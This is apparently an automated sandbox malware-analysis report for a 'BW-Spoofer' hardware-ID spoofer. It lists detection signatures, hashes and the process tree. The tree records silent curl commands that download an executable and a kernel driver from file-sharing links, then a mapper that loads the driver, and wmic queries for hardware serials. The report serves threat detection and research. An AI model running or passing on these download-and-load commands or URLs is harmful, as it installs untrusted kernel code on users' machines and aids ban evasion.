Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    35s
  • max time network
    38s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240412-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19/04/2024, 06:39

General

  • Target

    BW-Spoofer v1.8.exe

  • Size

    608KB

  • MD5

    80b055d3c394b8d67a3471209baaffff

  • SHA1

    fc91bae8f742757c369ece9708c90cb45bd38a84

  • SHA256

    421adb3b2479b676edb2e536abadf8063b0bf56f50732a06e0c59afb7ed995b3

  • SHA512

    e75b76d7c776a85aa3f14de4e0da983b8997b811901f30b153234a05a01b9b18aee4729189e7195b98f696c35b6d7032ef8b6bfee307307f4a9be09ab8ee30fb

  • SSDEEP

    12288:f+Q/fzJitK/Ujd7c9c+l3xa5yGsi+1u3ENf:f+QjJitMUJ7+l3xULsc3E5

Score
8/10

Malware Config

Signatures

  • Downloads MZ/PE file
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 26 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\BW-Spoofer v1.8.exe
    "C:\Users\Admin\AppData\Local\Temp\BW-Spoofer v1.8.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4808
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\BW-Spoofer v1.8.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3496
      • C:\Windows\system32\certutil.exe
        certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\BW-Spoofer v1.8.exe" MD5
        3⤵
          PID:216
        • C:\Windows\system32\find.exe
          find /i /v "md5"
          3⤵
            PID:5116
          • C:\Windows\system32\find.exe
            find /i /v "certutil"
            3⤵
              PID:4728
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c color D
            2⤵
              PID:1164
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c cls
              2⤵
                PID:2632
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c cls
                2⤵
                  PID:2808
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://beatware.xyz/discord
                  2⤵
                  • Enumerates system info in registry
                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  • Suspicious use of WriteProcessMemory
                  PID:3376
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffecc7046f8,0x7ffecc704708,0x7ffecc704718
                    3⤵
                      PID:1052
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,15806070981629463471,11258501745294158395,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:2
                      3⤵
                        PID:1780
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2152,15806070981629463471,11258501745294158395,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:3
                        3⤵
                          PID:4752
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2152,15806070981629463471,11258501745294158395,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2848 /prefetch:8
                          3⤵
                            PID:912
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,15806070981629463471,11258501745294158395,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
                            3⤵
                              PID:1232
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,15806070981629463471,11258501745294158395,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
                              3⤵
                                PID:1188
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,15806070981629463471,11258501745294158395,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4640 /prefetch:1
                                3⤵
                                  PID:1196
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,15806070981629463471,11258501745294158395,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:1
                                  3⤵
                                    PID:4340
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2152,15806070981629463471,11258501745294158395,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3860 /prefetch:8
                                    3⤵
                                      PID:5016
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2152,15806070981629463471,11258501745294158395,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=4892 /prefetch:8
                                      3⤵
                                      • Modifies registry class
                                      PID:3348
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,15806070981629463471,11258501745294158395,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5932 /prefetch:8
                                      3⤵
                                        PID:1836
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,15806070981629463471,11258501745294158395,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5932 /prefetch:8
                                        3⤵
                                          PID:3124
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c cls
                                        2⤵
                                          PID:2316
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c color D
                                          2⤵
                                            PID:4532
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c cls
                                            2⤵
                                              PID:4936
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c color D
                                              2⤵
                                                PID:3160
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c cls
                                                2⤵
                                                  PID:1188
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c curl https://link.storjshare.io/s/jv77rvcr2fbthhfxsdqj4tz55nua/bw-ontop%2Ffree%2Fbwmapper.exe?download=1 -o C:\Windows\Temp\mapv2.exe --silent
                                                  2⤵
                                                    PID:1448
                                                    • C:\Windows\system32\curl.exe
                                                      curl https://link.storjshare.io/s/jv77rvcr2fbthhfxsdqj4tz55nua/bw-ontop%2Ffree%2Fbwmapper.exe?download=1 -o C:\Windows\Temp\mapv2.exe --silent
                                                      3⤵
                                                        PID:840
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c curl https://link.storjshare.io/s/jxw2m5pxqvcndnlpkcyfj63g2niq/bw-ontop%2Finjected%20ud%20is%20ud.sys?download=1 -o \Windows\Temp\drvv5.sys --silent
                                                      2⤵
                                                        PID:1488
                                                        • C:\Windows\system32\curl.exe
                                                          curl https://link.storjshare.io/s/jxw2m5pxqvcndnlpkcyfj63g2niq/bw-ontop%2Finjected%20ud%20is%20ud.sys?download=1 -o \Windows\Temp\drvv5.sys --silent
                                                          3⤵
                                                            PID:4124
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c cls
                                                          2⤵
                                                            PID:2024
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c cd C:\Windows\Temp\ && mapv2.exe drvv5.sys
                                                            2⤵
                                                              PID:3208
                                                              • C:\Windows\Temp\mapv2.exe
                                                                mapv2.exe drvv5.sys
                                                                3⤵
                                                                • Sets service image path in registry
                                                                • Executes dropped EXE
                                                                • Suspicious behavior: LoadsDriver
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:3528
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c cls
                                                              2⤵
                                                                PID:2896
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c cls
                                                                2⤵
                                                                  PID:2260
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c color D
                                                                  2⤵
                                                                    PID:3500
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c cls
                                                                    2⤵
                                                                      PID:2464
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c cls
                                                                      2⤵
                                                                        PID:3052
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c cls
                                                                        2⤵
                                                                          PID:2880
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c cls
                                                                          2⤵
                                                                            PID:4884
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c cls
                                                                            2⤵
                                                                              PID:2032
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c cls
                                                                              2⤵
                                                                                PID:960
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c color D
                                                                                2⤵
                                                                                  PID:3688
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c cls
                                                                                  2⤵
                                                                                    PID:4656
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c echo Diskdrive:
                                                                                    2⤵
                                                                                      PID:4524
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c wmic diskdrive get serialnumber
                                                                                      2⤵
                                                                                        PID:1600
                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                          wmic diskdrive get serialnumber
                                                                                          3⤵
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:1464
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c echo BIOS:
                                                                                        2⤵
                                                                                          PID:3176
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c wmic bios get serialnumber
                                                                                          2⤵
                                                                                            PID:4580
                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                              wmic bios get serialnumber
                                                                                              3⤵
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:468
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c echo Motherboard:
                                                                                            2⤵
                                                                                              PID:1036
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c wmic baseboard get serialnumber
                                                                                              2⤵
                                                                                                PID:4672
                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                  wmic baseboard get serialnumber
                                                                                                  3⤵
                                                                                                    PID:4444
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c echo Bios UUID:
                                                                                                  2⤵
                                                                                                    PID:4872
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c wmic path win32_computersystemproduct get uuid
                                                                                                    2⤵
                                                                                                      PID:2236
                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                        wmic path win32_computersystemproduct get uuid
                                                                                                        3⤵
                                                                                                          PID:1076
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c echo Mac:
                                                                                                        2⤵
                                                                                                          PID:528
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c getmac
                                                                                                          2⤵
                                                                                                            PID:4120
                                                                                                            • C:\Windows\system32\getmac.exe
                                                                                                              getmac
                                                                                                              3⤵
                                                                                                                PID:4728
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c pause >nul
                                                                                                              2⤵
                                                                                                                PID:3996
                                                                                                            • C:\Windows\System32\CompPkgSrv.exe
                                                                                                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                              1⤵
                                                                                                                PID:1648
                                                                                                              • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                1⤵
                                                                                                                  PID:4656

                                                                                                                Network

                                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                                Replay Monitor

                                                                                                                Loading Replay Monitor...

                                                                                                                Downloads

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                  Filesize

                                                                                                                  152B

                                                                                                                  MD5

                                                                                                                  3d94406b964753cc5222ab1343f54bb1

                                                                                                                  SHA1

                                                                                                                  a5e7de0781fa1fabb3cd89564f2e5693cb4dee16

                                                                                                                  SHA256

                                                                                                                  fd9923a217cd8d2c44a63dbfe52ec262e7c80b1f1e50c6e0f21f8379c90e7762

                                                                                                                  SHA512

                                                                                                                  1ad2c144e7bbd809f400f8782586d3768fc82bcef39db986f766897c344efec77ab2c0b6d9c5ee2019ef5cf9ad0c46bdd25392cbc9dbf9ea80e800577f0fc598

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                  Filesize

                                                                                                                  152B

                                                                                                                  MD5

                                                                                                                  49dde89f025a1cce8848473379f7c28f

                                                                                                                  SHA1

                                                                                                                  b405956b33146b2890530e818b6aa74bba3afb88

                                                                                                                  SHA256

                                                                                                                  d6d125ba686b825bb22ab967a346051780cab1f55fc68a2f3efdf3fb5598f96b

                                                                                                                  SHA512

                                                                                                                  53050344674d8886db66e25f42d97bf46b26229972631f857286c2a303897cda58d85ee8ca768bbfb1fc07e52567315ea85d57e39b5b382916700ec389946506

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                  Filesize

                                                                                                                  864B

                                                                                                                  MD5

                                                                                                                  85c93cd3830ae6c765e73141a2956df0

                                                                                                                  SHA1

                                                                                                                  6962c4e2c4f5de72f86ed52ddfe798a8d438ca79

                                                                                                                  SHA256

                                                                                                                  a55056b1f684f80de5ce9a612279e95dcc9cf39c814fe1d11a71fef2e64ce426

                                                                                                                  SHA512

                                                                                                                  9e6bf30c746c4214e37511ae63ded98b00d2deb9afea3245b9a3206650237346e828d2c0df7b160043ee2af5317c76303b8b5597908301cca57d8b2e85a0801d

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                  Filesize

                                                                                                                  813B

                                                                                                                  MD5

                                                                                                                  18285e81786fd859cebf1cdf5268b108

                                                                                                                  SHA1

                                                                                                                  9d7a6bc3035143dd5757967d0799c87fb80637b7

                                                                                                                  SHA256

                                                                                                                  f741d75610d7c6ba12145dc9b974350ffc8caa72a203e2e0c9c69ceb8aac0313

                                                                                                                  SHA512

                                                                                                                  08adfdcc43001d719065da797260a7650ee1a9c0a02677fae769be7359b8fab53db32a54c6775ae7390364e63695c8d6b8ea1eafd7865d9ead8003b7d368ea0a

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                  Filesize

                                                                                                                  5KB

                                                                                                                  MD5

                                                                                                                  b6da64b58dc031d8384323aaa7a7dd15

                                                                                                                  SHA1

                                                                                                                  fc589f5944083aa4b741cbc3ce5e8e4b3e8d9af8

                                                                                                                  SHA256

                                                                                                                  2c35cd4219305daaae8949af82aedf242b68b87117f39cb158123965ab79962e

                                                                                                                  SHA512

                                                                                                                  cf61f70e6c51092de55e252c6f0c141f6ba12a373b7e620562ad632badb5c58e0c0691b800b9c8f450a404491bc2ad94a79d21e2c761ec89e0685c8543771050

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                  Filesize

                                                                                                                  7KB

                                                                                                                  MD5

                                                                                                                  9c1168181f38ff7403e693f768f4401d

                                                                                                                  SHA1

                                                                                                                  628090e370b8317cc96c102da4de04b3207dccd0

                                                                                                                  SHA256

                                                                                                                  163d247ffbdef93a7bbe1f4060dc27dfb58660880d57dd0a16b9d44e31264df2

                                                                                                                  SHA512

                                                                                                                  3a8fba4f4abdc9b19fd36cab108b5b0e6e83d9ecc4e49c70d2c41333ca8cc0b78ddb63b04e3e762d8d57da042c231a270e4a69b4226594a9d92be03b93c36c10

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

                                                                                                                  Filesize

                                                                                                                  24KB

                                                                                                                  MD5

                                                                                                                  7c43199d1e5acf5a31e1cbef990fbc47

                                                                                                                  SHA1

                                                                                                                  df7bd524b9b3175325c0aff3469ea7f2211d3061

                                                                                                                  SHA256

                                                                                                                  52a6fd2a2fff53c738c77a6385e7e1677f8990781699f78c63d5a4b0fe566d22

                                                                                                                  SHA512

                                                                                                                  aae886642b40ffb0676534fd85abe43ab588526b8e952b12a1bcafc73cb05103c76aee4fa32cc18c74af6c59aa1dc84bcda09ebccb7d11adc79fee3bfc93e2d1

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                                                  Filesize

                                                                                                                  16B

                                                                                                                  MD5

                                                                                                                  6752a1d65b201c13b62ea44016eb221f

                                                                                                                  SHA1

                                                                                                                  58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                                                                                  SHA256

                                                                                                                  0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                                                                                  SHA512

                                                                                                                  9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                  Filesize

                                                                                                                  10KB

                                                                                                                  MD5

                                                                                                                  3dab013c5b140a53d98e5f75568053cb

                                                                                                                  SHA1

                                                                                                                  0f1d913ecf12c0b18cff533def5e92ca5f4aa082

                                                                                                                  SHA256

                                                                                                                  d823c718891898c8b876a2d34f8d3fdcf42ba83fa53da82f490c81ca426b7885

                                                                                                                  SHA512

                                                                                                                  c4d4c5876626aa2d695ae81469c437bc6947d9e9830bae8c83dd09401c817c44a658b3b9c6cc79369e7990cba6d19970d9bb49071eaa46d24f751a7f8613f110

                                                                                                                • C:\Windows\Temp\mapv2.exe

                                                                                                                  Filesize

                                                                                                                  112KB

                                                                                                                  MD5

                                                                                                                  e25351a9dd41d1c339530c465fe18569

                                                                                                                  SHA1

                                                                                                                  2461491598a2ab092b352f2caf375accde6e9d85

                                                                                                                  SHA256

                                                                                                                  d38d41c4ef8b4ded6ddcba4d290231dc0521e9900ecd71c1db90d103fe19d869

                                                                                                                  SHA512

                                                                                                                  888ab312cda4d811254ab56d73238fd4419a2c3a3d59fbce3dfabe466ccd9081927389acdc740c9414cd380a6fb42bd881b7105cb444321d38a2f728333dc9d1